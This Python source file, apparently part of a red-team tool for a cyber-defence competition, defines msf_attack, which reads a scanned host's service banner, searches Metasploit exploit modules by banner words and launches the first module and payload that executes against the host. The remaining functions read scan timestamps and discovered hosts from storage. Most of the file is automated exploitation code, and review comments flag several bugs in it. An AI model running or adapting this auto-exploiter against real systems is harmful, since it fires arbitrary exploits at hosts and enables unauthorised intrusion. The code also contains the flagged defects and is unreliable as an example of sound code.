def msf_attack(host: str, *args, **kwargs) -> None:
    """
    Connect to msfrpcd (starting it if it is not running), pick one service of
    *host* that has a banner, search Metasploit modules by words of that banner
    and launch the first module whose payload can be executed.

    Progress and failures are reported through ``MSF.log``; the function returns
    ``None`` in every path and returns early when the RPC connection cannot be
    established, when no module is found, or when the search hits the task
    time limit.

    :param host: Key into the host dictionary returned by ``get_hosts()``.
    :param args: Unused here; presumably part of the task signature — confirm with caller.
    :param kwargs: Unused here; see ``args``.
    :return: None.
    """
    client = None
    tries = 0
    # Retry the RPC connection a bounded number of times (see the guard below).
    while not client:
        if tries > 5:
            MSF.log("Giving up connecting to msfrpcd.", 'danger')
            return
        try:
            client = MsfRpcClient(MSF.get_setting('password'))
        except ConnectionRefusedError:
            MSF.log("Can't connect to msfrpcd. Trying to start it...", 'warning')
            # A shared lock in `storage` is used so only one worker starts msfrpcd.
            # NOTE(review): get-then-incr is not atomic; two workers arriving at the
            # same moment can both see no lock and both spawn msfrpcd — confirm
            # whether `storage` offers an atomic set-if-absent.
            if storage.get(get_lock()):
                sleep(10)
            else:
                storage.incr(get_lock())
                # NOTE(review): the RPC password is passed on the command line, which
                # is visible to other local users through the process list.
                # NOTE(review): if `run` raises, the lock is never deleted.
                run(['msfrpcd', '-P', MSF.get_setting('password')])
                storage.delete(get_lock())
        except MsfRpcError:
            MSF.log("Error connecting to msfrpcd. Is the password correct?", 'danger')
        # NOTE(review): the original indentation was lost; this counter is assumed
        # to be incremented once per loop iteration regardless of which branch ran.
        tries += 1
    target = get_hosts()[host]
    query = ""
    port = None
    # Loop through available services in random order, stop when there is a banner
    # `index` selects which whitespace-separated word of the banner becomes the
    # first search query.
    index = 1
    # NOTE(review): random.sample() on a dict view requires a sequence on
    # Python 3.11+ (it would need list(...)); confirm the target runtime.
    for p, data in random.sample(target['ports'].items(), len(target['ports'])):
        if data.get('banner'):
            # Naive banner parsing
            # NOTE(review): `query` is still "" at this point, so this branch never
            # fires; it looks like it was meant to inspect the banner text — confirm.
            if query.lower() in ["microsoft", "windows"]:
                index = 2
            port = p
            break
    exploit = None
    # NOTE(review): the banner is untrusted text received from the scanned service
    # and is printed raw here. If no port had a banner, `data` is whatever the last
    # iteration left (or unbound when `ports` is empty) and may lack 'banner'.
    print(data['banner'])
    # Walk the banner words from `index` onwards until a module is found or the
    # banner is exhausted.
    while not exploit and index < len(data['banner'].split()):
        exploit = None
        print("Getting exploit")
        try:
            query = data['banner'].split()[index]
            # Skip label-like words such as "Server:".
            if query.endswith(':'):
                index += 1
                continue
            print("Query: " + query)
            try:
                mod = random.choice(msf_search(client, query))
            except SoftTimeLimitExceeded:
                MSF.log(
                    "We're running out of time while trying to search. "
                    "Increase task timeout to prevent this.", "warning")
                return
            exploit = client.modules.use('exploit', mod)
        # IndexError: the search returned no modules (random.choice on an empty
        # list); MsfRpcError: the module could not be loaded. Either way move on
        # to the next banner word.
        except (IndexError, MsfRpcError):
            index += 1
    if not exploit:
        MSF.log("Couldn't find exploit.", "warning")
        print("Couldn't find exploit.")
        return
    print("Went with " + str(exploit.modulename))
    MSF.log("Using exploit {} against {}:{}".format(exploit.modulename, host, port))
    # Required option names arrive as bytes, so the keys are encoded to match.
    for r in exploit.required:
        if r == b'RHOST':
            exploit['RHOST'.encode()] = host
        elif r == b'RPORT':
            exploit['RPORT'.encode()] = port
    execute = None
    # `p` is reused here as the payload index (it was the port above).
    p = 0
    # Try each payload in order until one is accepted; ValueError is treated as
    # "this payload is not applicable" and the next one is tried.
    while p < len(exploit.payloads) and not execute:
        try:
            execute = exploit.execute(payload=exploit.payloads[p].decode())
        except ValueError:
            p += 1
        else:
            MSF.log(
                'Exploit ' + str(exploit.modulename) + ' against ' + host + ' launched.', 'success')
def scan_in_progress() -> int:
    """
    Return the number of scans currently running.

    :return: Count of running scans; 0 when the counter is unset or empty.
    """
    raw_count = storage.get('scan_in_progress')
    if not raw_count:
        return 0
    return int(raw_count)
def get_last_scan() -> int:
    """
    Return the time of the most recent nmap scan.

    :return: UNIX timestamp of the last scan; 0 when none is recorded.
    """
    stamp = storage.get('last_nmap_scan')
    if not stamp:
        return 0
    return int(stamp)
def get_last_update() -> int:
    """
    Return the time of the most recent IScorE update.

    :return: UNIX timestamp of the last update; 0 when none is recorded.
    """
    stamp = storage.get('last_iscore_update')
    if not stamp:
        return 0
    return int(stamp)
def get_hosts() -> Dict:
    """
    Load the discovered hosts from storage.

    :return: Dictionary of discovered hosts; empty when nothing is stored.
    """
    serialized = storage.get('hosts')
    if not serialized:
        serialized = "{}"
    return json.loads(serialized)